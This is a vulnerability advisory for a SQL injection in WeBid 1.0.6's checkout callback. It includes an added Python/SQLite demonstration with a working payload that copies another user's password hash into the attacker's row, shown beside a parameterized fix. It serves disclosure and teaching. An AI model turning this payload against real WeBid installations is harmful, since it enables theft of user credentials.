WeBid SQL Injection Exploit

Summary

WeBid 1.0.6 is prone to a SQL injection vulnerability in its checkout callback handling.

Credit:

Details

Vulnerable Systems:
 * WeBid 1.0.6

Vulnerable Code:
Line 53 of the validate.php file
Lines 198 through 202 and 234 in the includes/functions_fees.php file

Proof of Concept:
Requesting validate.php?toocheckout=asdf calls the toocheckout_validate() function.
toocheckout_validate() takes unsanitized POST input from two different parameters (total and cart_order_id).
toocheckout_validate() calls callback_process() if the POST parameter credit_card_processed is equal to 'Y'.
The unsanitized parameters are concatenated directly into an UPDATE query, with no quoting, casting or escaping:
$query = 'UPDATE ' . $DBPrefix . 'users SET balance = balance + ' . $payment_amount . $addquery . ' WHERE id = ' . $custom_id;
Because the values land in the SET and WHERE clauses as raw SQL text, an attacker can retrieve data using a time-based blind injection technique (a conditional delay and measuring the response time) or by appending a second assignment that sets a pre-existing column to the output of an embedded subquery and then reading that column back through the application.
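The following is an added example, not code from WeBid or from the advisory author. It recreates the concatenation pattern of the UPDATE statement above in an in-memory SQLite database with a constructed users table, shows the second technique described (writing another row's data into a column the attacker can read back), and puts a type-checked, parameterized version beside it. The table columns (email, password, balance), the $DBPrefix value and the mapping of the total and cart_order_id parameters onto $payment_amount and $custom_id are assumptions made for the demonstration; the time-based variant relies on MySQL's SLEEP() and is not reproduced here because SQLite has no equivalent.

```python
"""Added example (not WeBid's code): simulate the concatenated UPDATE from
validate.php / includes/functions_fees.php against SQLite to show why an
unsanitized `total` lets an attacker copy another row's data into their own
row, and how a parameterized, type-checked version stops it.
The schema, rows and DBPrefix value are constructed for this demo."""
import sqlite3
from decimal import Decimal, InvalidOperation

DBPrefix = "webid_"  # assumed prefix; WeBid's real value is set at install time


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a column the attacker can read back from
    their own profile (email) and a secret in another user's row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE {DBPrefix}users (
            id INTEGER PRIMARY KEY,
            email TEXT,
            password TEXT,
            balance REAL
        );
        INSERT INTO {DBPrefix}users VALUES (1, 'admin@example.org', 'hash_of_admin_pw', 0);
        INSERT INTO {DBPrefix}users VALUES (2, 'attacker@example.org', 'hash_of_attacker_pw', 0);
    """)
    return conn


def vulnerable_update(conn, payment_amount: str, custom_id: str, addquery: str = "") -> str:
    """Mirrors the vulnerable line: raw request values concatenated into SQL."""
    query = ("UPDATE " + DBPrefix + "users SET balance = balance + "
             + payment_amount + addquery + " WHERE id = " + custom_id)
    conn.execute(query)
    conn.commit()
    return query


def hardened_update(conn, payment_amount: str, custom_id: str) -> None:
    """Fixed form: reject anything that is not a number, then bind as parameters
    so the values can never be parsed as SQL."""
    try:
        amount = Decimal(payment_amount)
    except InvalidOperation:
        raise ValueError("total is not a decimal number")
    if not custom_id.isdigit():
        raise ValueError("cart_order_id is not an integer")
    conn.execute(
        "UPDATE " + DBPrefix + "users SET balance = balance + ? WHERE id = ?",
        (float(amount), int(custom_id)),
    )
    conn.commit()


def email_of(conn, uid: int) -> str:
    return conn.execute(
        f"SELECT email FROM {DBPrefix}users WHERE id = ?", (uid,)).fetchone()[0]


def balance_of(conn, uid: int) -> float:
    return conn.execute(
        f"SELECT balance FROM {DBPrefix}users WHERE id = ?", (uid,)).fetchone()[0]


# Attacker (user id 2) sends a `total` that keeps the arithmetic valid and
# appends a second assignment whose value is a subquery against the admin row.
PAYLOAD = "0, email = (SELECT password FROM " + DBPrefix + "users WHERE id = 1)"


def demo_vulnerable() -> str:
    conn = make_db()
    vulnerable_update(conn, PAYLOAD, "2")
    # The admin's password hash is now stored in the attacker's email field,
    # which the application will happily display on the attacker's profile page.
    return email_of(conn, 2)


def demo_hardened() -> str:
    conn = make_db()
    try:
        hardened_update(conn, PAYLOAD, "2")
    except ValueError:
        pass  # rejected before any SQL is built; row is untouched
    return email_of(conn, 2)


def demo_hardened_legit() -> float:
    conn = make_db()
    hardened_update(conn, "12.50", "2")  # a normal payment still works
    return balance_of(conn, 2)


if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())
    print("hardened  :", demo_hardened())
    print("legit     :", demo_hardened_legit())
```

The fix in the PHP code is the same shape: cast $custom_id to an integer and $payment_amount to a float (or validate them against a strict numeric pattern) before they reach the query, or better, move to prepared statements with bound parameters so that request data is never interpreted as SQL.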

Disclosure Timeline:
Published: 2013-01-09

Categories: Exploits